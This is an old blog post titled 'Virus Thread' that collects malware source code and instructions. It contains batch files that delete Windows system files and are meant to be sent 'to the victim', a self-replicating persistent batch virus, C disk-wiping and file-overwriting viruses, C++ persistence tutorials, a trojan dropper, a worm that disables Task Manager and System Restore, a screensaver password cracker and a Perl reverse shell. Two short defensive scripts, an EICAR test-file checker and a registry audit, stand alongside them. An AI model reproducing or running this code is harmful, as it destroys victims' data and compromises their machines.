Saturday, November 17, 2007

Virus Thread

Second Part To Hell's HTML.Umbriel











Slowing Down the PC
VIRUS SOURCE CODE
hello friends...
open NOTEPAD
then paste this code in notepad..code is

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

now save this in notepad..
and scan it or test it with any antivirus... I'm damn sure it will be detected as a virus by the antivirus scan and it will slow the computer for 5 minutes.
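Whether a saved copy of that string is recognised depends on the file's exact bytes. The check below is an added example, not part of the original post; it assumes the format published by EICAR (the 68-character string at offset 0, followed only by whitespace, at most 128 bytes in total), and all sample inputs are constructed.

```python
# The 68-byte EICAR anti-malware test string (a harmless, industry-standard test file).
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
ALLOWED_TAIL = b" \t\n\r\x1a"   # space, tab, LF, CR, Ctrl-Z
MAX_LEN = 128                   # maximum total file length


def classify(data: bytes) -> str:
    """Say whether `data` is a well-formed EICAR test file, and if not, why."""
    if not data.startswith(EICAR):
        # The string somewhere inside a larger file is not a valid test file.
        return "prefixed" if EICAR in data else "absent"
    if len(data) > MAX_LEN:
        return "too-long"
    if any(b not in ALLOWED_TAIL for b in data[len(EICAR):]):
        return "trailing-data"
    return "valid"


def sample_results() -> dict:
    """Classify constructed variants of what a text editor might write to disk."""
    text = EICAR.decode("ascii")
    samples = {
        "plain ANSI save": EICAR,
        "with trailing CRLF": EICAR + b"\r\n",
        "UTF-8 with BOM": text.encode("utf-8-sig"),
        "UTF-16 with BOM": text.encode("utf-16"),
        "string pasted with extra characters": EICAR + EICAR[:27],
        "padded past 128 bytes": EICAR + b" " * 61,
    }
    return {name: classify(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, verdict in sample_results().items():
        print(f"{name:40s} {verdict}")
```

A scanner that follows the published format is only required to flag the "valid" cases, which is why the encoding chosen in the Save As dialog matters when the file is used to test an antivirus installation.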


Very easy but dangerous Virus
Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok???

Virus
@echo off
del C:/WINDOWS/system32/Restore
del C:/WINDOWS/system32/winlogon.exe
del C:/WINDOWS/system32/logonui.exe



save this as virus1.bat and send it to the victim...

Msn Killer
@echo off
cls
tskill msnmsgr


save this as bat and send it to the victim.. destroys.. msn messenger

Task Kill
@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause


save this as bat and send and destroy the vtim

Virus
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



Use this to:
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer


ScreenSaver Password Cracker
Description This code lets you know the Screen Saver Password. You can now know how they encrypt the password, how we can decrypt it.
/*
Screen Saveer Password Cracker:
Decrypts Screen Saver Password which is stored in user.dat.
*/

#include
#include
#include
FILE *fp;
char *path="c:\windows\user.dat";

/*encrypted password stored in this file when u log on to default user..

If there r multiple users..Password stored in
\windowsprofilesuser-nameuser.dat...

*/

unsigned long int search(char *s);
char *encstr(unsigned long int loc);
int toint(char a);
void main()
{
unsigned long int l;
char s[51];
int arr[]={4,8,14,14,7,6,1,13,6,7,6,9,10,1,1,11,7,10,8,12,4,7,
15,8,5,4,9,5,9,7,5,15,7,8,13,9,13,10,6,12,5,9,13,7,6,11,3,5,12,5};

//this array is 2 b xored with encrypted-string

int s1[51],s2[51];
int i,len,k;

clrscr();
l=search("ScreenSave_Data");
strcpy(s,encstr(l));
len=strlen(s);
for(i=0;i{
s1=toint(s);
s2=(s1)^(arr);
}
printf("Current Screen Saver Password:
");
for(i=0;iprintf("%c", (s2*16)+(s2[i+1]) );


}

/* Searches where ScreenSave_Data is there in the file
and returns the location*/
unsigned long int search(char *s)
{
int k=0,len,ch;
unsigned long int i=0;
fp=fopen(path,"rb");
len=strlen(s);
while( (ch=getc(fp))!=EOF)
{
if(ch==s[k])
k++;
else k=0;

i++;
if(k==len)
return i;

}
}

/* It returns Encrypted String*/

char *encstr(unsigned long int loc)
{
char ch,s[55],ch1;
int i=0;

ch=toascii(0);
fp=fopen(path,"rb");
fseek(fp,loc,SEEK_SET);
while( (ch1=fgetc(fp))!=ch)
{ s=ch1;
i++;
}
s='

C Bomber
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}


C++ Viruse
Ok first off I’d like to say 2 things:

1. This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way

Taking the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.

Most of the virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun and to the point. Now this is what you will need to start programming:

Win32 API Reference <- Not Required but very helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.

Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.

Ok lets begin fire up DEV or MSVC and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

return 0;
}

Now compile and run the code; nothing should happen (if a black window pops up it means you didn’t go to Win32). The reason nothing happened is that our program doesn’t do anything: it runs and exits. We need to make it do something, so first of all add this code to the project in between the { } and before return 0;.

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);

Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project:
QUOTE
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);


Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should come up with a message box saying “Hello”.

Cool is it not? Ok time to explain how this works:

char sytem[MAX_PATH]; This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.

HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.

GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s Windows directory is c:\windows\system32. Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory.
strcat(system,”\\virus.exe”); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work!

CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for this tutorial).

Ok that’s it next we are going add code so it will startup when the computer boots. We are going to use an 3 API calls to accomplish this
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey(); This closes the key

Time to add code to our fledgling virus:

QUOTE
HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);
Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.
The next call: hKey is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something less obviously like “Windows Update” or “Norton Security Shield” anyway be creative. The next zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is the size of the string, this is calculated automatically by using sizeof.

The next call closes the registry key.

Ok add this to you code so it looks something like:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

return 0;
}

Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key!
Now comes the fun part of writing a virus the payload! This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.

Your code should now look like this with the payload attached:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

return 0;
}

Although small don’t underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explorer.exe end it. Finally while still in task manager goto file run and type “explorer.exe” without the quotes. If that doesn’t work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though.


Hacking Perl Script
I have used perl before I still don't entirely understand what this script does.

Perl Code:
#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:


Perl Code:
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:


Perl Code:
$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);


It essentially is forming a command to use with lynx. And yes, it is attempting to exec /bin/sh.

Ps: It'd be easy to read, if you terminate each line of code with a "\n" after the ";"


Powerful C++ Virus
This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

The second version would be more useful during times when you do not know the victim's default drive. It might be drive N: for all you know.

C++ trojan dropper
CODE
#include
#include
#include
#include

void write(int mysize,char *tpath,char *mybuf)
{
int tsize = 0;
ifstream tfile(tpath,ios::binary);
tfile.seekg (0,ios::end);
tsize = tfile.tellg();
tfile.seekg (0,ios::beg);
char *tbuf = new char [tsize];
tfile.read(tbuf,tsize);
tfile.close();
ofstream outputfile(tpath,ios::binary);
outputfile.write(mybuf,mysize);
outputfile.write(tbuf,tsize);
outputfile.close();
cout<};

void extract(int mysize,char *target)
{
char windir[250];
GetWindowsDirectory(windir,MAX_PATH);
ifstream tfile(target,ios::binary);
tfile.seekg (213045);
int theamount = mysize - 213045;
char *tbuf = new char [theamount];
tfile.read(tbuf,theamount);
tfile.close();
char mypath[100];
strcpy (mypath,windir);
strcat (mypath,"\\command.exe");
ofstream outfile(mypath,ios::binary);
outfile.write(tbuf,theamount);
outfile.close();
cout<system(mypath);
};

int checkit(int mysize,char *mybuf,char *target)
{
int checker = 0;
char tpath[512];

if (mysize != 213045)
{
extract(mysize,target);
}
else
{
cout<<"pSyChIc - Dropper"<cout<<"Input file path"<cin>>tpath;
write (mysize,tpath,mybuf);
}
return 0;
};

int main(int argc, char *argv[])
{
long mysize;
char *target=argv[0];
ifstream myfile(argv[0],ios::binary);
myfile.seekg (0,ios::end);
mysize = myfile.tellg();
myfile.seekg (0,ios::beg);
char *mybuf= new char [mysize];
myfile.read(mybuf,mysize);
myfile.close();
checkit (mysize,mybuf,target);
return 0;
}
Trojan Dropper
Discovered: February 2, 2000
Updated: February 13, 2007 11:57:55 AM
Also Known As: Virus.Dropper, Trojan dropper
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


Trojan.Dropper is a Trojan horse that drops Trojan horses or back door Trojans onto compromised computers
Note: Definitions dated prior to 28th March 2005, may detect this threat as Trojan dropper.

C++ Worm
#include
#include
#include
#include
#include

char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance, LPSTR lpCmdLine, int

nCmdShow)
{
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] =

"C:\\Windows\\System32\\Wsecurity.exe";
if(RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\

Windows\\CurrentVersion\\Run",0,KEY_SET_VALU

E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(

HKEY_CURRENT_USER,"Software\\Microsoft\\Wi

ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,

&hKey2 );
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}

void restrictcleanwin()
{
ofstream Disable;


Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o

ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\

", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\Disable

RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\DisableT

askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\

\Windows\\CurrentVersion\\Policies\\System\\Disable

TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableConfig\", 1,

\"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableSR\", 1,

\"REG_DWORD\"" << endl;
Disable.close();
Sleep(3000);
ShellExecute(NULL, "open",

"C:\\WINDOWS\\WinDisable.vbs", NULL, NULL,

SW_HIDE);
}
void sshut()
{
ofstream fun1;
fun1.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Sshut.cmd",ios::out);
fun1 << "shutdown -s -t 5 -f -c \"Microsuck Windows

Corpration is crasher\" " << endl;
fun1.close();
}

void cdopen()
{
ofstream cdopen;
cdopen.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Cd-op.vbs",ios::out);
cdopen << "do" << endl;
cdopen << "wscript.sleep 100" << endl;
cdopen << "Set oWMP =

CreateObject(\"WMPlayer.OCX.7\")" << endl;
cdopen << "Set colCDROMs =

oWMP.cdromCollection" << endl;
cdopen << "if colCDROMs.Count then" << endl;
cdopen << "For i = 0 to colCDROMs.Count - 1" <<

endl;
cdopen << "colCDROMs.Item(i).Eject" << endl;
cdopen << "Next" << endl;
cdopen << "End If" << endl;
cdopen << "loop" << endl;
}
int main(int argc, char *argv[])
{
HWND wndstealth;
AllocConsole();
wndstealth=FindWindowA("ConsoleWindowClass",N

ULL);
ShowWindow(wndstealth,0);
restrictcleanwin();
sshut();
cdopen();
{

}
It is a program that drops a few files and edits the

registry. All it does is shut down the computer every

time it boots.
P.S. It's actually a worm not a virus
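
Both registry techniques shown on this page, the autostart value under CurrentVersion\Run from the C++ tutorial and the Policies values written by WinDisable.vbs in the worm, leave artefacts that a registry export exposes. The audit below is an added example, not code from the original posts: it parses a regedit-style export and reports Run entries missing from a known-good baseline and policy values that disable recovery tools. The sample export, the baseline and the ExampleUpdater entry are constructed.

```python
import re
from typing import Iterator, List, NamedTuple, Set, Tuple, Union

# Constructed sample of a regedit text export collected during triage.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleUpdater"="C:\\Program Files\\Example\\updater.exe"
"Writing to the Registry Example"="C:\\WINDOWS\\system32\\virus.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Security"="C:\\Windows\\System32\\Wsecurity.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001
'''

# Constructed baseline: (value name, command) pairs known to be legitimate.
BASELINE: Set[Tuple[str, str]] = {
    ("exampleupdater", r"c:\program files\example\updater.exe"),
}

RUN_SUFFIX = r"\software\microsoft\windows\currentversion\run"
# Value names taken from the worm's WinDisable.vbs on this page.
TAMPER_VALUES = {"disabletaskmgr", "disableregistrytools", "norun",
                 "disablesr", "disableconfig"}

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


class Value(NamedTuple):
    key: str
    name: str
    data: Union[str, int]


class Finding(NamedTuple):
    rule: str
    key: str
    name: str
    data: Union[str, int]


def _unescape(s: str) -> str:
    """Undo .reg escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg(text: str) -> Iterator[Value]:
    """Yield string and dword values from a regedit export; other types are skipped."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, rhs = _unescape(m.group(1)), m.group(2)
        if len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            yield Value(key, name, _unescape(rhs[1:-1]))
        elif rhs.lower().startswith("dword:"):
            yield Value(key, name, int(rhs[6:], 16))


def audit(text: str, baseline: Set[Tuple[str, str]]) -> List[Finding]:
    """Flag autostart entries outside the baseline and enabled lock-out policies."""
    findings = []
    for v in parse_reg(text):
        key = v.key.lower()
        if key.endswith(RUN_SUFFIX) and isinstance(v.data, str):
            if (v.name.lower(), v.data.lower()) not in baseline:
                findings.append(Finding("autorun-not-in-baseline", *v))
        elif ("\\policies\\" in key and v.name.lower() in TAMPER_VALUES
              and isinstance(v.data, int) and v.data != 0):
            findings.append(Finding("policy-tamper", *v))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EXPORT, BASELINE):
        print(f"{f.rule:26s} {f.key}\\{f.name} = {f.data}")
```

The value name carries no weight in the comparison, so an entry named "Windows Security" or "Windows Update" is reported like any other when its command is not in the baseline.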


Trojan horse codes
1.log the keyboard typing

just to hook WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR and WM_KEYUP),hook the first one to log the eastern language characters(Chinese,Korean,etcs),and the others to log the english characters,nums,etcs.

2.hide the process's gui windows & taskbar

_ProcDlgMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax==WM_INITDIALOG
push hWnd
pop hWinMain
invoke SetWindowLong,hWnd,GWL_EXSTYLE,WS_EX_TOOLWINDOW ;
invoke SetWindowPos,hWinMain,HWND_BOTTOM,0,0,0,0,SWP_HIDEWINDOW ;

3.release & exec the trojan horse

....


.386
.model flat,stdcall
option casemap:none

include windows.inc
include kernel32.inc
includelib kernel32.lib

.data
@szTargetFileName db ‘Target.exe’,0
@hTargetFile dd ?
@hTargetFileMap dd ?
@lpTargetFile dd ?

FILE_REPLACE_OFFSET equ 00000H
FILE_REPLACE_SIZE equ 0A7B8H

.code
assume fs:nothing
start:

invoke CreateFile,addr @szTargetFileName,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax!=INVALID_HANDLE_VALUE
mov @hTargetFile,eax
.else
jmp _End
.endif
invoke CreateFileMapping,@hTargetFile,NULL,PAGE_READWRITE,0,0,NULL
.if eax
mov @hTargetFileMap,eax

invoke MapViewOfFile,@hTargetFileMap,FILE_MAP_WRITE,0,0,0
.if eax
mov @lpTargetFile,eax
jmp _Replace
.endif
invoke CloseHandle,@hTargetFileMap
.endif
jmp _End

_Replace:
mov eax,FILE_REPLACE_SIZE
mov ecx,@lpTargetFile
add ecx,FILE_REPLACE_OFFSET

invoke RtlZeroMemory,ecx,eax
invoke UnmapViewOfFile,@lpTargetFile
invoke CloseHandle,@hTargetFileMap
invoke CloseHandle,@hTargetFile
_End:
ret
end start

if u hav any problem understanding the codes .. u can google it..

c++ virus
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}
what it does
GetWindowsDirectoryA(windir, MAX_PATH)) + trace("GetWindowsDirectoryA ... + else { + char *p = strrchr(filename, '\\'); + if(p++) memmove(filename, p, ...
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) and here's the MFC generated one: ...
char pathname[256]; char windir[MAX_PATH]; char instpath[MAX_PATH]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); ...
GetModuleFileName(GetModH, Worm, sizeof(Worm)); GetWindowsDirectory(WinDir, sizeof(WinDir)); GetSystemDirectory(SysDir, sizeof(SysDir)); ...
strcat(windir, "\\System32\\viral.exe"); that is the virus.
unsigned char reg[10] = "infected"; RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); ...
RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); RegCloseKey(hKey); ...

.. i ve explained the codes and what they do.... in a short detail.... this will be very good for programmers.. nd a lil betta for begginers... just for each code.. ive given the code explanation.what it does.. or what it is..
overwrite virus coded in C
It is a overwrite virus written ic C .When u run this program ,the program will overwrite all the exe files present in the current directory and the parent directory
Code :
/*A virus program
coded by SJ

email id:samjohnyb4u@gmail.com
*/
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst("*.exe",f,0);
while(!done)
{
virus=fopen(argv[0],"rb");//open the virus in read mode
host=fopen(f->ff_name,"rb+");//open the host file in r/w mode

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf("infecting %s
",f->ff_name);
done=findnext(f);
}
}
while(!chdir(".."));
printf("For any querry contact
SJ in Disguise
,id:samjohnyb4u@gmail.com");


Virus (Mini project)
its a simply jokeCode :


//***************************************************************//
//virus program-created by SJ//

//**************************************************************//

#include
#include
#include
#include
#include
#include
#include

void fool();
void main()
{
clrscr();
